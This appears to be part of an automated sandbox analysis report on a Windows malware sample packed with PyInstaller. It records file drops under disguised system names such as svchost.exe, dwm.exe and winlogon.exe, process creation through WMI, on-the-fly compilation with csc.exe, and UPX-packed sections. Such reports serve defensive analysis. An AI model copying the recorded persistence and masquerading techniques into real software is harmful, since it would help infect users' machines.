Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmp, hacn.exe, 00000005.00000003.1725096795.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1725774568.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1751685629.00007FFE13311000.00000002.00000001.01000000.0000000F.sdmp, based.exe, 00000008.00000002.2660929046.00007FFE13241000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2657823913.00007FFE13201000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000008.00000002.2625141523.00007FFE11EB1000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000008.00000002.2481464532.00007FFDFB67C000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2532291858.00007FFDFBA21000.00000040.00000001.01000000.0000001D.sdmp

Source: VaTlw2kNGc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: VaTlw2kNGc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: VaTlw2kNGc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: VaTlw2kNGc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: VaTlw2kNGc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"

Source: C:\ProgramData\Microsoft\based.exe

Code function: 8_2_00007FFDFB4358A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

8_2_00007FFDFB4358A0

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_5115546

Jump to behavior

Source: _hashlib.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0xc47c
Source: setup.exe.11.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: _socket.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0xf3db
Source: _queue.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0xbdb3
Source: python310.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x170f8b
Source: select.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x12cec
Source: libssl-1_1.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x3d34c
Source: libcrypto-1_1.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x110586
Source: _bz2.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x174bf
Source: wxyubnjmnlae.tmp.13.dr	Static PE information: real checksum: 0x0 should be: 0x316d6
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x5531f
Source: sqlite3.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x9ae0f
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x28949
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x213c2
Source: svchost.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e6084
Source: libcrypto-1_1.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x110586
Source: updater.exe.13.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: python310.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x170f8b
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x174bf
Source: _ctypes.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0xe78a
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xf3db
Source: _ssl.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x1721f
Source: s.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x62099a
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xc47c
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x12cec
Source: unicodedata.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x5531f
Source: _sqlite3.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x1ae1a
Source: libffi-7.dll.6.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: ChainComServermonitor.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: wouVpTZDoyPyABKEH.exe.52.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: based.exe.4.dr	Static PE information: real checksum: 0x5d9a9a should be: 0x5e534c
Source: _decimal.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x28949
Source: dasHost.exe.52.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: _lzma.pyd.6.dr	Static PE information: real checksum: 0x0 should be: 0x213c2

Source: Build.exe.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: hacn.exe.4.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.5.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.5.dr	Static PE information: section name: .00cfg
Source: python310.dll.5.dr	Static PE information: section name: PyRuntim
Source: s.exe.5.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: libffi-7.dll.6.dr	Static PE information: section name: UPX2
Source: setup.exe.11.dr	Static PE information: section name: .xdata
Source: svchost.exe.11.dr	Static PE information: section name: .didat
Source: updater.exe.13.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0094125A push ecx; ret	4_2_0094126D
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00941DB0 push ecx; ret	4_2_00941DC3
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929B506C push rcx; iretd	5_2_00007FF6929B506D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E0ACDD push rcx; retf 003Fh	6_2_00000202B6E0ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E3C6DD push rcx; retf 003Fh	6_2_00000202B6E3C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E6ACDD push rcx; retf 003Fh	6_2_00000202B6E6ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE62ACDD push rcx; retf 003Fh	8_2_00000273EE62ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE65C6DD push rcx; retf 003Fh	8_2_00000273EE65C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE68ACDD push rcx; retf 003Fh	8_2_00000273EE68ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576EC6 push r10; retf	8_2_00007FFDFB576EC9
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576CDC push r8; ret	8_2_00007FFDFB576CE9
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576F9D push r10; ret	8_2_00007FFDFB576FB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576EAB push rsi; ret	8_2_00007FFDFB576EAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB5791B3 push rdi; iretd	8_2_00007FFDFB5791B5
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB57A4B9 push rdx; ret	8_2_00007FFDFB57A510
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB5785B7 push r12; ret	8_2_00007FFDFB5785F3
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576E9C push rsp; iretd	8_2_00007FFDFB576E9D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB579D95 push rsp; iretq	8_2_00007FFDFB579D96
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576F64 push r8; ret	8_2_00007FFDFB576F6C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB578F63 push r12; iretd	8_2_00007FFDFB578F7A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB57856C push rbp; retf	8_2_00007FFDFB578585
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB57A174 push rsp; ret	8_2_00007FFDFB57A175
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB578E76 push rbp; iretq	8_2_00007FFDFB578E77
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576F42 push r12; ret	8_2_00007FFDFB576F5A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576E54 push rdi; iretd	8_2_00007FFDFB576E56
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576C31 push r10; ret	8_2_00007FFDFB576C33
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576E0B push rsp; ret	8_2_00007FFDFB576E13
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576D06 push r12; ret	8_2_00007FFDFB576D08
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB579C12 push rsp; retf	8_2_00007FFDFB579C13
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB578F0E push r12; ret	8_2_00007FFDFB578F35
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB576EE0 push r12; ret	8_2_00007FFDFB576EFE

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	File created: C:\ProgramData\svchost.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Mozilla Firefox\dwm.exe			Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File written: C:\Program Files\Mozilla Firefox\dwm.exe

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Process created: "C:\Users\user\Desktop\VaTlw2kNGc.exe"

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\rVVLbyhv.log	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\iaFEdjXM.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\RKFGfNRs.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\chceADSX.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qGmlrcYy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Recovery\winlogon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\EcYAEBsU.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\UuxpgXjt.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NXnICQCE.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ovdDmGAG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\THthvKov.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\psELHGPB.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\GQcIpPoS.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bbeWvQkg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\MAhhiIaK.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IJrrbLaQ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\eeEmWDhS.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\CjJRSFHW.log	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\HMPjFLLW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vCoCyIOs.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Recovery\powershell.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Mozilla Firefox\dwm.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll	Jump to dropped file
